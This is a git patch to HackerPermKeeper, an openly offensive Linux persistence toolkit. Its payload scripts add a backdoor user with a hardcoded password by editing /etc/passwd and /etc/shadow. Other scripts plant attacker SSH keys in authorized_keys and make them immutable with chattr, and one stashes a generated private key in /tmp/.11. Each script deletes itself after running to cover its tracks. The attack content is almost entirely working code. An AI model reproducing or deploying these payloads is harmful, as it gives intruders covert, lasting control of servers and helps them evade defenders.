From c5bbb2a2338e517eee1c1c22443d0a37d3d75f7c Mon Sep 17 00:00:00 2001 From: RuoJi6 <79234113+RuoJi6@users.noreply.github.com> Date: Mon, 25 Sep 2023 13:23:56 +0800 Subject: [PATCH] Add files via upload --- config.py | 4 +-- main.py | 2 +- payload/2adduser/adduser.py | 17 +++++++--- payload/2adduser/adduser_new_user.py | 21 +++++++----- payload/6sshkey/sshkey_local.py | 16 ++++++++- payload/6sshkey/sshkey_target.py | 50 ++++++++++++++++++---------- 6 files changed, 76 insertions(+), 34 deletions(-) diff --git a/config.py b/config.py index 1f910f1..a1aba53 100644 --- a/config.py +++ b/config.py @@ -10,7 +10,7 @@ def configs(): - print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green')) + print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green')) print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red')) @@ -52,7 +52,7 @@ def configs(): print('检测对方服务器适合什么类型的权限维持模块', colored('[*****]', 'red')) def configss(): - print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green')) + print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green')) print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) diff --git a/main.py b/main.py index 6ef03e9..0e1051e 100644 --- a/main.py +++ b/main.py @@ -44,7 +44,7 @@ def ml(command): # print('No') try: - name = colored('HackerPermKeeper v2.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green') + name = colored('HackerPermKeeper v4.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green') arg = ArgumentParser(description=name) # 创建解析器, description内容就是 arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1") arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ") diff --git a/payload/2adduser/adduser.py b/payload/2adduser/adduser.py index c1d68d7..c317f4a 100644 --- a/payload/2adduser/adduser.py +++ b/payload/2adduser/adduser.py @@ -37,10 +37,17 @@ def adduser(user, password): def deluser(user): - command = "sed -i '/^" + user + ":/d' /etc/shadow" - ml(command) - command = "sed -i '/^" + user + ":/d' /etc/passwd" - ml(command) + try: + ml('chattr -i /etc/passwd') + ml('chattr -i /etc/shadow') + command = "sed -i '/^" + user + ":/d' /etc/shadow" + # "sed -i '/^passw123:/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + except Exception as e: + pass + def delete_current_script(): try: @@ -53,6 +60,6 @@ def delete_current_script(): if __name__ == '__main__': user = 'passw123' password = 'admin@#45123' + deluser(user) # 删除用户 adduser(user, password) - # deluser(user) #删除用户 delete_current_script() # 删除当前执行脚本文件 diff --git a/payload/2adduser/adduser_new_user.py b/payload/2adduser/adduser_new_user.py index 560296e..bd2004e 100644 --- a/payload/2adduser/adduser_new_user.py +++ b/payload/2adduser/adduser_new_user.py @@ -2,6 +2,7 @@ from __future__ import print_function import subprocess import sys,os +import requests def ml(command): process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -33,6 +34,17 @@ def adduser(user, password): else: print("----------------------->失败<-----------------------") +def deluser(user): + try: + ml('chattr -i /etc/passwd') + ml('chattr -i /etc/shadow') + command = "sed -i '/^" + user + ":/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + except Exception as e: + pass + def delete_current_script(): try: script_path = os.path.abspath(sys.argv[0]) @@ -41,16 +53,9 @@ def delete_current_script(): except Exception as e: print("无法删除当前脚本文件:", e) -def deluser(user): - command = "sed -i '/^" + user + ":/d' /etc/shadow" - ml(command) - command = "sed -i '/^" + user + ":/d' /etc/passwd" - ml(command) - - if __name__ == '__main__': user = 'passw123' password = 'admin@#45123' + deluser(user) # 删除用户 adduser(user, password) - # deluser(user) #删除用户 delete_current_script() # 删除当前执行脚本文件 diff --git a/payload/6sshkey/sshkey_local.py b/payload/6sshkey/sshkey_local.py index 7926d86..8756492 100644 --- a/payload/6sshkey/sshkey_local.py +++ b/payload/6sshkey/sshkey_local.py @@ -75,17 +75,31 @@ def delete_current_script(): except Exception as e: print("无法删除当前脚本文件:", e) +def delsshKey(user): + try: + if 'root' in user: + ml('chattr -i /root/.ssh') + ml('chattr -i /root/.ssh/authorized_keys') + ml('rm -rf /root/.ssh/authorized_keys') + else: + ml('chattr -i /home/'+user+'/.ssh') + ml('chattr -i /home/'+user+'/.ssh/authorized_keys') + ml('rm -rf /home/' + user + '/.ssh/authorized_keys') + except Exception as e: + pass + if __name__ == '__main__': id_ed25519_pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF9OQyvU7TkC4Julezg31Lbj2YB3RSwhmM0yJwwtO4iK kali@kali" # 调用 miyue 函数来在文件末尾写入新内容 # ssh-keygen -t ed25519 -N "admin!@#45123" + user = ml('whoami').strip() + delsshKey(user) try: miyue("HostKey /etc/ssh/ssh_host_ed25519_key") miyue("PubkeyAuthentication yes") miyue("AuthorizedKeysFile .ssh/authorized_keys") except Exception as e: print('低权限用户配置文件写入失败,有的低权限用户不影响使用') - user = ml('whoami').strip() if 'root' in user: root_authorized_keys(id_ed25519_pub) ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys') diff --git a/payload/6sshkey/sshkey_target.py b/payload/6sshkey/sshkey_target.py index ed40465..17e5aba 100644 --- a/payload/6sshkey/sshkey_target.py +++ b/payload/6sshkey/sshkey_target.py @@ -2,7 +2,8 @@ # !/usr/bin/env python from __future__ import print_function import subprocess -import os,sys +import os, sys + def ml(command): process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -26,7 +27,7 @@ def miyue(new_content): file.write(new_content + '\n') -def generate_ssh_key(password,user): +def generate_ssh_key(password, user): if 'root' in user: command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /' + user + '/.ssh/id_ed25519' else: @@ -40,18 +41,20 @@ def generate_ssh_key(password,user): print("SSH密钥生成失败。错误信息:") print(error.decode()) -def file_key(user,keyt): + +def file_key(user, keyt): if 'root' in user: file_path = "/" + user + "/.ssh/authorized_keys" else: file_path = "/home/" + user + "/.ssh/authorized_keys" if os.path.exists(file_path): print("文件写入成功") - id_ed25519(user,keyt) + id_ed25519(user, keyt) else: print("文件写入失败") -def id_ed25519(user,keyt): + +def id_ed25519(user, keyt): if 'root' in user: file_path = "/" + user + "/.ssh/id_ed25519.pub" file_path2 = "/" + user + "/.ssh/id_ed25519" @@ -62,42 +65,55 @@ def id_ed25519(user,keyt): print("id_ed25519.pub&id_ed25519删除失败") else: print("id_ed25519.pub&id_ed25519删除成功") - print('----->利用成功,生成的用户为:',ml('whoami').strip(),'<-----') - print('----->连接命令: ssh -i 密钥文件 '+ str(ml('whoami').strip())+'@ip <-----') - print('请下载{'+keyt+'}密钥文件连接') - + print('----->利用成功,生成的用户为:', ml('whoami').strip(), '<-----') + print('----->连接命令: ssh -i 密钥文件 ' + str(ml('whoami').strip()) + '@ip <-----') + print('请下载{' + keyt + '}密钥文件连接') def delete_current_script(): try: script_path = os.path.abspath(sys.argv[0]) os.remove(script_path) - print("当前脚本文件已成功删除"+script_path) + print("当前脚本文件已成功删除" + script_path) except Exception as e: print("无法删除当前脚本文件:", e) + +def delsshKey(user): + try: + if 'root' in user: + ml('chattr -i /root/.ssh') + ml('chattr -i /root/.ssh/authorized_keys') + else: + ml('chattr -i /home/' + user + '/.ssh') + ml('chattr -i /home/' + user + '/.ssh/authorized_keys') + except Exception as e: + pass + + if __name__ == '__main__': # 调用 miyue 函数来在文件末尾写入新内容 # 调用 generate_ssh_key 函数生成SSH密钥对 + user = ml('whoami').strip() + delsshKey(user) try: miyue("HostKey /etc/ssh/ssh_host_ed25519_key") miyue("PubkeyAuthentication yes") miyue("AuthorizedKeysFile .ssh/authorized_keys") except Exception as e: print('低权限用户配置文件写入失败,有的低权限用户不影响使用') - user = ml('whoami').strip() password = "admin!@#45123" keyt = '/tmp/.11' - generate_ssh_key(password,user) + generate_ssh_key(password, user) if 'root' in user: ml('cat /' + user + '/.ssh/id_ed25519.pub >> /' + user + '/.ssh/authorized_keys && chmod 600 /' + user + '/.ssh/authorized_keys && chmod 700 /' + user + '/.ssh/') - ml('cp /' + user + '/.ssh/id_ed25519 '+keyt) - ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /'+ user + '/.ssh/id_ed25519.pub') + ml('cp /' + user + '/.ssh/id_ed25519 ' + keyt) + ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /' + user + '/.ssh/id_ed25519.pub') ml('chattr +i /' + user + '/.ssh && chattr +i /' + user + '/.ssh/authorized_keys') else: ml('cat /home/' + user + '/.ssh/id_ed25519.pub >> /home/' + user + '/.ssh/authorized_keys && chmod 600 /home/' + user + '/.ssh/authorized_keys && chmod 700 /home/' + user + '/.ssh/') - ml('cp /home/' + user + '/.ssh/id_ed25519 '+keyt) - ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/'+ user + '/.ssh/id_ed25519.pub') + ml('cp /home/' + user + '/.ssh/id_ed25519 ' + keyt) + ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/' + user + '/.ssh/id_ed25519.pub') ml('chattr +i /home/' + user + '/.ssh && chattr +i /' + user + ' /home/.ssh/authorized_keys') - file_key(user,keyt) + file_key(user, keyt) delete_current_script() # 删除当前执行脚本文件